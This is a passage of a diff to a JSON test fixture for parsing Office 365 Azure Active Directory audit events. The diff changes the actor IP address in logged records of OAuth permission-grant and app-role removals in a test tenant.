OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -9526,9 +9526,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:16:18", "ExtendedProperties": [ { @@ -9762,7 +9762,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -9792,9 +9792,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:16:18", "ExtendedProperties": [ { @@ -10028,7 +10028,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 